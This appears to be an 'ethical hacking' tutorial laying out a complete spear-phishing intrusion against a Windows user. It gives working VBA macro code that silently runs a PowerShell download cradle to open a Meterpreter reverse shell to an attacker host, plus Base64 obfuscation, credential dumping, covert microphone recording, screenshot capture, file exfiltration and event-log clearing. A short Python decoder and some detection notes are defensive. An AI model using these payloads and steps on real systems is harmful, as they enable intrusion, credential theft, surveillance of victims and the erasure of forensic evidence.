PowerShell lets an attacker carry out malicious actions without dropping any additional binaries on disk, which makes it far more likely that the activity goes unnoticed. What makes PowerShell such an attractive tool is that it is installed by default on every modern Windows system.
This ethical hacking tutorial walks through how to compromise a targeted system and bypass the conventional security defences typically deployed in large enterprises. You’ll learn how to create VBA macro-based malware, use phishing to deliver it, and use Kali Linux to catch the resulting session and carry out post-exploitation.
Note: This is an ethical hacking tutorial that aims to illustrate how attackers could infiltrate a target’s system by taking advantage of numerous techniques. All information here is for educational and authorized penetration testing purposes only.
This is a demonstration of how an attacker can gain a foothold inside a target organisation without anyone noticing, and of how spear phishing can be used as an extremely effective attack vector to get there.
Clearly, we are going to need to gather information about our target first: OSINT is the starting point.
If we are launching a spear-phishing campaign, it is important to find the victim most susceptible to such an attack. More significantly, we want a target with poor OPSEC, since that gives us a better chance of finding information we can use.
The ideal spear-phishing target is therefore an individual who is easily deceived into opening the email, and ideally one who is not on the organisation’s list of “High Profile Users”, so that the message is less likely to be stopped by the extra protection such users receive.
We could monitor one individual’s social media profiles and look for details that let us craft a convincing email: one the victim will open, and whose attachment they will open as well.
1. OSINT Stage: How To Find Email Addresses Of Employees Working At Companies Easily
There are several websites that can search a victim’s domain and return the email addresses of the organisation’s employees:
As you can see, the internet offers numerous tools that help with the OSINT stage.
2. How To Write Macro Malware Code
First, we are going to download a PowerSploit script from GitHub:
What we want is the raw version of Invoke-Shellcode.ps1 as stored in the PowerSploit repository, because that is the form the macro will fetch and execute directly.
We must embed a call to that script in a Visual Basic for Applications (VBA) macro inside an Excel document. That document becomes the primary means of compromising the target’s system.
Let’s write the macro code, one piece at a time.
♠ Sub Auto_Open() ↔ Declares a macro that runs automatically when the workbook is opened (once the user has enabled content), not when Excel itself starts.
♣ Call Shell("cmd.exe ↔ Launches a local Command Prompt.
♥ /c powershell.exe ↔ Tells cmd.exe to run PowerShell on the victim’s computer.
♦ -noexit ↔ Keeps the PowerShell process alive after the one-liner has run. This matters: Invoke-Shellcode injects into the current PowerShell process, so if powershell.exe exits, the Meterpreter session dies with it.
⊕ "IEX (New-Object Net.WebClient) ↔ IEX is the alias for Invoke-Expression, which executes whatever string it is given; New-Object Net.WebClient creates a .NET HTTP client. It has nothing to do with Internet Explorer, although it does honour the system proxy settings (it will not authenticate to a proxy unless credentials are supplied).
⊕ .DownloadString('https://downloadshellcodefromhost'); ↔ Fetches the PowerSploit script from the specified URL as a string, which IEX then executes.
⊗ Invoke-Shellcode ↔ The function defined by that script. It generates the Metasploit shellcode for the chosen payload and injects it straight into memory in the current process; nothing is written to disk, which is what gets it past signature-based anti-virus.
⊗ -Payload windows/meterpreter/reverse_https ↔ Selects the payload to deploy.
- -Lhost x.x.x.x ↔ The IP address of our own attacking machine, where the Metasploit handler will be listening.
- -Lport 443 ↔ The port on the attacking machine that the target’s system will connect back to.
- -Force ↔ Skips the interactive confirmation prompt Invoke-Shellcode would otherwise show.
Θ vbHide ↔ Runs the command with the Command window hidden.
Θ End Sub ↔ Closes the macro.
Our VBA macro therefore turns out to be this:
|Sub Auto_Open()|
|    Call Shell("cmd.exe /c powershell.exe -noexit ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force""", vbHide)|
|End Sub|
Obviously, replace x.x.x.x with the IP address of your own listener.
The resulting Excel document was detected by only 18 of the 60 AV vendors on VirusTotal, which illustrates that relying on AV signatures alone is a problem. Bear in mind that anything uploaded to VirusTotal is shared with the vendors, so a payload intended for a real engagement should never be submitted there.
Stripped of the VBA wrapper, the command the macro hands to PowerShell is:
|powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force"|
3. Obfuscating The PowerShell Code With Base64 Encoding
Base64 encoding of our command can be achieved like this. PowerShell’s -EncodedCommand switch expects the Base64 of the UTF-16LE bytes of the script, which is why the Unicode encoding is used rather than UTF-8:
|$command = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 443 -Force"|
|$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)|
|$encodedCommand = [Convert]::ToBase64String($bytes)|
|$encodedCommand >> output.txt|
The string in output.txt is then passed to powershell.exe with -EncodedCommand in place of the plain-text script. This is encoding, not encryption: anyone who Base64-decodes the string gets the original command back.
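As an added example (not code from the original post, and not part of PowerSploit), here is the same encoding done in Python alongside its inverse: the decode an analyst performs on a powershell.exe command line taken from a process-creation event, with the download URL, payload name and listener host/port pulled out of the result. Python is used because this is what triage tooling is usually written in. The listener address 192.0.2.10 and the sample command line are constructed placeholders standing in for x.x.x.x.

```python
import base64
import re

# The command the macro launches (from the page), with a constructed
# documentation-range listener address standing in for x.x.x.x.
COMMAND = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/"
    "CodeExecution/Invoke-Shellcode.ps1'); "
    "Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
    "-Lhost 192.0.2.10 -Lport 443 -Force"
)


def encode_command(command: str) -> str:
    """Same transformation as the PowerShell snippet on the page:
    UTF-16LE bytes, then Base64. powershell.exe -EncodedCommand accepts
    only this encoding; Base64 of UTF-8 text decodes to garbage."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """The inverse: what script block logging, or an analyst, recovers."""
    return base64.b64decode(encoded).decode("utf-16-le")


# PowerShell accepts -e, -ec, -enc and the full switch name, case-insensitively.
ENCODED_SWITCH = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_iocs(cmdline: str) -> dict:
    """Triage a powershell.exe command line from a process-creation event.

    Decodes an -EncodedCommand argument if present, then pulls out the
    indicators that matter for this cradle: download URL(s), the Metasploit
    payload name and the listener host/port the implant will call back to.
    """
    match = ENCODED_SWITCH.search(cmdline)
    script = decode_command(match.group(1)) if match else cmdline
    payload = re.search(r"-Payload\s+(\S+)", script, re.IGNORECASE)
    lhost = re.search(r"-Lhost\s+(\S+)", script, re.IGNORECASE)
    lport = re.search(r"-Lport\s+(\d+)", script, re.IGNORECASE)
    return {
        "encoded": match is not None,
        "download_cradle": bool(re.search(
            r"DownloadString|Invoke-Expression|\bIEX\b", script, re.IGNORECASE)),
        "urls": URL_RE.findall(script),
        "payload": payload.group(1) if payload else None,
        "lhost": lhost.group(1) if lhost else None,
        "lport": int(lport.group(1)) if lport else None,
    }


if __name__ == "__main__":
    # Constructed process-creation command line, as the macro would produce
    # it after switching to -EncodedCommand.
    encoded = encode_command(COMMAND)
    sample_cmdline = f"cmd.exe /c powershell.exe -noexit -EncodedCommand {encoded}"
    print(extract_iocs(sample_cmdline))
```

Run it as a script to see the decoded indicators for the constructed command line; the same extract_iocs call works on a plain (unencoded) command line, which is the form the macro on this page actually uses.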
We can also password-protect the VBA project by going to Project Properties > Protection tab > under Lock project, ticking “Lock project for viewing” and typing a new password twice. This only stops casual inspection in the VBA editor: the macro source is still stored in the document, and tools such as olevba extract it regardless of the password, so it makes forensics slightly more tedious rather than impossible.
4. Let’s Setup Kali Linux
It’s a good idea to run Kali Linux in a virtual machine, since that makes it easy to delete afterwards.
It’s pretty straightforward to set up the Metasploit HTTPS reverse handler in msfconsole:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
exploit
To start the handler, type exploit. LHOST must be an address the victim can actually reach (127.0.0.1 only works when testing on the same machine) and must match the -Lhost value in the macro; binding port 443 requires running msfconsole as root.
5. Make A Well-Crafted Spear-Phishing Email & Send It To The Victim
We can use an online fake-mailer service to send the spear-phishing email to the victim.
Here are two popular fake emailer services:
Keep in mind that the target’s company may use an enterprise-grade email security service with anti-spam and anti-spoofing controls, so the email may be blocked before it ever reaches the recipient.
Some experimentation with what actually gets delivered is strongly recommended.
6. The Target Gets Tricked And Is Convinced That The Email Is Real
The ideal scenario is that the target opens the email, believes it is credible, opens the attachment and clicks “Enable Content”.
Our macro then executes the code without the victim noticing anything.
We’ll see the following in our terminal, indicating that sessions have been opened:
Meterpreter session 1 opened.
Meterpreter session 2 opened.
7. Initiate Your Attacks
Get Windows Shell
Grab a Windows command shell from Meterpreter with the shell command.
We’ll see something similar to this:
meterpreter > shell
Process 1337 created.
Microsoft Windows [Version 1337]
(c) 2018 Microsoft Corporation. All rights reserved.
Then type whoami.
This prints the domain and user name of the account the macro ran as, which is the victim’s own account since Excel runs in their session (hostname shows the machine name).
Use WCMDump To Dump Windows Credentials
We can use Invoke-WCMDump to dump the credentials stored in the Windows Credential Manager for the user whose session we landed in.
From the shell, run:
|powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1'); Invoke-WCMDump"|
Record Audio From The Target’s Microphone & Save It To A File On Disk
From the shell, run:
|powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1'); Get-MicrophoneAudio -Path c:\windows\temp\sunny.wav -Length 10 -Alias 'SUNNY'"|
This records ten seconds of audio to c:\windows\temp\sunny.wav. Under the hood the script calls the Windows audio API directly from PowerShell, so no recording tool has to be dropped on disk.
Audio may serve as an important source of information.
Take Screenshots At A Regular Interval And Save Them To Disk Using The Exfiltration PowerShell Script
From the shell, run:
|powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1'); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00"|
Nothing here is likely to trip an AV signature, but it is not invisible either: with PowerShell script block logging enabled (Event ID 4104), the full content of each downloaded script is logged, and on PowerShell 5 and later AMSI inspects the script as IEX runs it. A process tree of excel.exe spawning cmd.exe and then powershell.exe is also a classic EDR detection.
Exfiltrate Sensitive Data By Downloading The Target’s Files On Their Computer
The ability to exfiltrate sensitive data, whether for espionage or for profit, is why sophisticated threat actors favour this kind of access.
We can download the files the earlier commands saved on the target’s computer with the Meterpreter download command: download (path of the file on the victim’s system). Note that backslashes must be doubled in the Meterpreter console.
It would look like this in the terminal:
meterpreter > download c:\\sunny.fextension
[*] downloading: c:\sunny.fextension -> c:\sunny.fextension
[*] downloaded : c:\sunny.fextension -> c:\sunny.fextension
8. Clear The Application, System, and Security Logs On The Target’s Windows System.
With Meterpreter, we use the clearev command to clear the logs on the compromised system.
We’ll see something like this:
meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >
Clearing the logs is itself noisy: Windows writes a “log was cleared” event (ID 1102 in the Security log, 104 in the System log) after the clear, so it survives clearev, and any SIEM that collects event logs will alert on it.
9. Quit Kali Linux
At this point, we can shut down Kali Linux.
10. Delete Kali VM & Erase Hard Disk
A real threat actor would likely not merely delete the Kali VM, but also completely wipe the underlying hard disk.